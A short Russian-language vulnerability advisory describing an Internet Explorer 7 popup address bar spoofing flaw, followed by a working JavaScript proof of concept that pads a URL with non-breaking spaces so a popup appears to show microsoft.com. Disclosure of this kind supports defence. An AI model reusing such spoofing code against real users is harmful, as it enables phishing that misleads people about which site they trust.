Программа: Microsoft Internet Explorer 7.x
Уязвимость позволяет удаленному злоумышленнику выполнить фишинг атаку. Уязвимость существует из-за того, что злоумышленник может дописать специальные символы к URL, открывающемся во всплывающем окне. В результате чего, во всплывающем окне будет отображена часть адресной строки, что может позволить злоумышленнику обманом заставить пользователя произвести нежелательные действия.
Пример:
http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/
<script language="JavaScript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
